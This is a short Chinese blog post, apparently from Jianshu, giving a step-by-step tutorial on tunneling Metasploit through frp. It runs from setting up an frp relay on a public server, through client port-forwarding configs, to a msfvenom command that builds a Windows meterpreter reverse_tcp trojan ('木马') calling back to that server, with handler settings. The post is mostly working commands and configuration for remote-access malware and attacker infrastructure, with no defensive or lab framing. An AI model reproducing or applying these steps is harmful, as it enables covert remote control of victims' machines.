frp内网穿透结合metasploit

1.frp是一款免费的内网穿透工具,当两个局域网的时候可以通过这个来进行渗透
2.首先准备一台具有公网的服务器
3.和ftp一样都是具有s端和c端的,s端下载和c端下载一定要保持版本号一直,再根据不同的内核下载不同的压缩包。

  • 比如s端:
    wget https://github.com/fatedier/frp/releases/frp_0.33.0_linux_amd64.tar.gz
  • 比如c端:
    wget https://github.com/fatedier/frp/releases/frp_0.33.0_darwin_amd64.tar.gz

4.服务器(只要是入口的都要放行:3999 6000 2333)

tar -zxvf frp_0.33.0_linux_amd64.tar.gz 
#进入frp解压目录
cd frp_0.33.0_linux_amd64.tar.gz
ls
#编辑frps.ini文件
vi frps.ini
#frp服务端与客户端连接端口,frps和frpc必须一致;防火墙放行该端口,
bind_port=39999(默认的是7000被我改了,科莫及~~~)
#启动frps
./frps

5.客户端

[common]
server_addr = 你的服务器ip
server_port = 39999

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 4444
remote_port = 2333

6.服务端和客户端的frp服务运行起来

./frps -c ./frps.ini
./frpc -c ./frpc.ini

7.木马程序制作
结合以前我生成木马的文章,注意点是payload需要和msfvenom -p的payload一样最后exploit才能创建session不关闭。
msfvenom -p windows/meterpreter/reverse_tcp lhost=你的服务器ip lport=2333 -f exe -o /Users/xingwangmingzhe/Downloads/shell.exe
set LHOST 127.0.0.1
set LPORT 4444

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。